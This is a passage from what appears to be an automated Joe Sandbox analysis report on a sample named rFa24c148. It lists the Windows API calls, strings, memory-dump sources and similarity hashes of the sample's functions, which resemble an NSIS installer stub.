                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$@qB$BqB$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                              • API String ID: 914957316-3515803648
                                                                                              • Opcode ID: f555b8f8d7a629cb31c752cf441c6d14d2dfedfb2abaaf91fc7246ea5f6fb938
                                                                                              • Instruction ID: afa308160dea80a5d8dcbd85ebd8b3f8f2b3ac55536d549029ec0fdf087277f4
                                                                                              • Opcode Fuzzy Hash: f555b8f8d7a629cb31c752cf441c6d14d2dfedfb2abaaf91fc7246ea5f6fb938
                                                                                              • Instruction Fuzzy Hash: 5D61C471644300BAE720AF269C4AF3B3A6CEB45745F80447FF940B62E1DB799D12CA2D
                                                                                              APIs
                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004041F7
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040420B
                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404228
                                                                                              • GetSysColor.USER32(?), ref: 00404239
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404247
                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404255
                                                                                              • lstrlenW.KERNEL32(?), ref: 0040425A
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404267
                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040427C
                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 004042D5
                                                                                              • SendMessageW.USER32(00000000), ref: 004042DC
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404307
                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040434A
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404358
                                                                                              • SetCursor.USER32(00000000), ref: 0040435B
                                                                                              • ShellExecuteW.SHELL32(0000070B,open,@qB,00000000,00000000,00000001), ref: 00404370
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040437C
                                                                                              • SetCursor.USER32(00000000), ref: 0040437F
                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004043AE
                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004043C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                              • String ID: @qB$N$open
                                                                                              • API String ID: 3615053054-1317396031
                                                                                              • Opcode ID: 9f8ac8ff2f5d328cc3453d20dad54c1a32f190e354825bf3c7395e5a162293c3
                                                                                              • Instruction ID: bf3a58da35b54ffee1731227a2abeb8335aa36a287bc534981c9d3d9286f6950
                                                                                              • Opcode Fuzzy Hash: 9f8ac8ff2f5d328cc3453d20dad54c1a32f190e354825bf3c7395e5a162293c3
                                                                                              • Instruction Fuzzy Hash: F4718FB1A00209BFDB109F61DD85E6A7B79FB44354F00803AFA01B62D0D778AD61CFA9
                                                                                              APIs
                                                                                              • lstrcpyW.KERNEL32(00425D38,NUL,?,00000000,?,?,?,00405C39,?,?,00000001,004057B1,?,00000000,000000F1,?), ref: 00405AA5
                                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405C39,?,?,00000001,004057B1,?,00000000,000000F1,?), ref: 00405AC9
                                                                                              • GetShortPathNameW.KERNEL32(00000000,00425D38,00000400), ref: 00405AD2
                                                                                                • Part of subcall function 00405948: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B82,00000000,[Rename],00000000,00000000,00000000), ref: 00405958
                                                                                                • Part of subcall function 00405948: lstrlenA.KERNEL32(00405B82,?,00000000,00405B82,00000000,[Rename],00000000,00000000,00000000), ref: 0040598A
                                                                                              • GetShortPathNameW.KERNEL32(?,00426538,00000400), ref: 00405AEF
                                                                                              • wsprintfA.USER32 ref: 00405B0D
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00426538,C0000000,00000004,00426538,?,?,?,?,?), ref: 00405B48
                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405B57
                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B8F
                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425938,00000000,-0000000A,00409514,00000000,[Rename],00000000,00000000,00000000), ref: 00405BE5
                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405BF7
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405BFE
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405C05
                                                                                                • Part of subcall function 004059E3: GetFileAttributesW.KERNEL32(00000003,00402DA9,00437800,80000000,00000003,?,?,?,00000000,00403425,?), ref: 004059E7
                                                                                                • Part of subcall function 004059E3: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403425,?), ref: 00405A09
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                              • String ID: %ls=%ls$8]B$8eB$NUL$[Rename]
                                                                                              • API String ID: 1265525490-2949686642
                                                                                              • Opcode ID: fe6212124c20aa7a949ef4aa6da6deeb019712e351ad6de50c3d19834e785aa9
                                                                                              • Instruction ID: 0a051ccaee0c074b1a09a4e80aa922ec39551e5d9eafb60cec8afc598b306fa0
                                                                                              • Opcode Fuzzy Hash: fe6212124c20aa7a949ef4aa6da6deeb019712e351ad6de50c3d19834e785aa9
                                                                                              • Instruction Fuzzy Hash: BC412671605B14BBE2206B215C49F6B7A6CDF45728F14003AF901F62D2D67CBD018EBD
                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                              • DrawTextW.USER32(00000000,004281A0,000000FF,00000010,00000820), ref: 00401156
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                              • String ID: F
                                                                                              • API String ID: 941294808-1304234792
                                                                                              • Opcode ID: 95dead6a558a01d4a5ec967a392ba08a15c3c6741a46ee5c6d7a895f4c731ce1
                                                                                              • Instruction ID: 4121dad2538bec1171c888a02065f78bbc92972143ed5d2ae8151d97d00695b6
                                                                                              • Opcode Fuzzy Hash: 95dead6a558a01d4a5ec967a392ba08a15c3c6741a46ee5c6d7a895f4c731ce1
                                                                                              • Instruction Fuzzy Hash: 68418A71804249AFDB058FA5DD459BFBBB9FF48310F00812AF951AA1A0C738EA51DFA5
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 004044A6
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004044D0
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404581
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 0040458C
                                                                                              • lstrcmpiW.KERNEL32(00427140,00422698,00000000,?,?), ref: 004045BE
                                                                                              • lstrcatW.KERNEL32(?,00427140), ref: 004045CA
                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004045DC
                                                                                                • Part of subcall function 00405537: GetDlgItemTextW.USER32(?,?,00000400,00404613), ref: 0040554A
                                                                                                • Part of subcall function 0040600B: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,004031D7,00436800,74DF3420,004033B7), ref: 0040606E
                                                                                                • Part of subcall function 0040600B: CharNextW.USER32(?,?,?,00000000), ref: 0040607D
                                                                                                • Part of subcall function 0040600B: CharNextW.USER32(?,00434000,00436800,00436800,00000000,004031D7,00436800,74DF3420,004033B7), ref: 00406082
                                                                                                • Part of subcall function 0040600B: CharPrevW.USER32(?,?,00436800,00436800,00000000,004031D7,00436800,74DF3420,004033B7), ref: 00406095
                                                                                              • GetDiskFreeSpaceW.KERNEL32(00420668,?,?,0000040F,?,00420668,00420668,?,00000000,00420668,?,?,000003FB,?), ref: 0040469D
                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046B8
                                                                                              • SetDlgItemTextW.USER32(00000000,00000400,00420658), ref: 0040473E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                              • String ID: @qB$A
                                                                                              • API String ID: 2246997448-3464470947
                                                                                              • Opcode ID: 668281cbb1a1bca9fe2ab6cdbcec13e7c0f733c30b05f3f358561a85ed904407
                                                                                              • Instruction ID: 0c6fa40730a198f5f3b00d197b033e886b1b3680f215deb67d5ef6a97ab5c625
                                                                                              • Opcode Fuzzy Hash: 668281cbb1a1bca9fe2ab6cdbcec13e7c0f733c30b05f3f358561a85ed904407
                                                                                              • Instruction Fuzzy Hash: A79163B1900205BBDB11AFA1DC85AAF77B8EF85314F10847BF601B72D1D77C9A418B69
                                                                                              APIs
                                                                                              • GetVersion.KERNEL32(00000000,00421678,?,00405058,00421678,00000000,00000000,?), ref: 00405E5C
                                                                                              • GetSystemDirectoryW.KERNEL32(00427140,00000400), ref: 00405EDA
                                                                                              • GetWindowsDirectoryW.KERNEL32(00427140,00000400), ref: 00405EED
                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405F29
                                                                                              • SHGetPathFromIDListW.SHELL32(?,00427140), ref: 00405F37
                                                                                              • CoTaskMemFree.OLE32(?), ref: 00405F42
                                                                                              • lstrcatW.KERNEL32(00427140,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F66
                                                                                              • lstrlenW.KERNEL32(00427140,00000000,00421678,?,00405058,00421678,00000000,00000000,?), ref: 00405FC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                              • String ID: @qB$@qB$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                              • API String ID: 900638850-3979664334
                                                                                              • Opcode ID: f493f2f44b5aba53667d27dbdef1c5594dcfff21b597d4d1ff9a7805494d454e
                                                                                              • Instruction ID: 8be6bcb63ccaebc5f1bc3563bf1d434f80ac3f189a087fad5798c32c49afab67
                                                                                              • Opcode Fuzzy Hash: f493f2f44b5aba53667d27dbdef1c5594dcfff21b597d4d1ff9a7805494d454e
                                                                                              • Instruction Fuzzy Hash: 3661D271A00906ABEF209F25CC44AAF37A5EF54314F10813BE955BA2D0D73D5A81CF9E
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00402D7A
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400,?,?,?,00000000,00403425,?), ref: 00402D96
                                                                                                • Part of subcall function 004059E3: GetFileAttributesW.KERNEL32(00000003,00402DA9,00437800,80000000,00000003,?,?,?,00000000,00403425,?), ref: 004059E7
                                                                                                • Part of subcall function 004059E3: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403425,?), ref: 00405A09
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003,?,?,?,00000000,00403425,?), ref: 00402DE2
                                                                                              Strings
                                                                                              • soft, xrefs: 00402E57
                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402F41
                                                                                              • Null, xrefs: 00402E60
                                                                                              • Error launching installer, xrefs: 00402DB9
                                                                                              • Inst, xrefs: 00402E4E
                                                                                              • P~A, xrefs: 00402DF7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$P~A$soft
                                                                                              • API String ID: 4283519449-1910535513
                                                                                              • Opcode ID: abdf6dc9aec78d787bca56cd4286c0aac7898623f056af6127e98b36157c78ec
                                                                                              • Instruction ID: 9a0bc50dc50940ee2abb7c3ced767a556554b68a68c4a60a299fb88064fb1f26
                                                                                              • Opcode Fuzzy Hash: abdf6dc9aec78d787bca56cd4286c0aac7898623f056af6127e98b36157c78ec
                                                                                              • Instruction Fuzzy Hash: 88512871900205ABDB209F65DE89BAF7BB8EB14358F10403BF904B62D1C7B88D418BAD
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00403003
                                                                                              • GetTickCount.KERNEL32 ref: 00403084
                                                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004030B1
                                                                                              • wsprintfW.USER32 ref: 004030C4
                                                                                              • WriteFile.KERNEL32(00000000,00000000,?,7FFFFFFF,00000000), ref: 004030F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick$FileWritewsprintf
                                                                                              • String ID: ... %d%%
                                                                                              • API String ID: 4209647438-2449383134
                                                                                              • Opcode ID: 13d77005233b2c703e88a738dcd56f5575194dca18d803a30cab386bf45fddca
                                                                                              • Instruction ID: 2f3b8c8ab01821edfbb7561a0937ed23110cd7788458c70898d592dcb6d42ddc
                                                                                              • Opcode Fuzzy Hash: 13d77005233b2c703e88a738dcd56f5575194dca18d803a30cab386bf45fddca
                                                                                              • Instruction Fuzzy Hash: 8A516D31900219ABCF10DF65D944AAF7BACAF48756F10413BE910BB2C0D7389E51CBA9
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00404040
                                                                                              • GetSysColor.USER32(00000000), ref: 0040405C
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00404068
                                                                                              • SetBkMode.GDI32(?,?), ref: 00404074
                                                                                              • GetSysColor.USER32(?), ref: 00404087
                                                                                              • SetBkColor.GDI32(?,?), ref: 00404097
                                                                                              • DeleteObject.GDI32(?), ref: 004040B1
                                                                                              • CreateBrushIndirect.GDI32(?), ref: 004040BB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2320649405-0
                                                                                              • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                              • Instruction ID: 7833da122bd5b54dba07469e608d39c2309fd7833842469cb0c606e819627665
                                                                                              • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                              • Instruction Fuzzy Hash: 5A2184B19047449BCB319F68DD08B5B7BF8AF40714F048A29EA95F22E0C738E904CB65
                                                                                              APIs
                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                • Part of subcall function 00405A66: ReadFile.KERNEL32(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031B1,00000000,00000000,00402FF1,000000FF,00000004,00000000,00000000,00000000), ref: 00405A7A
                                                                                                • Part of subcall function 00405CBE: wsprintfW.USER32 ref: 00405CCB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
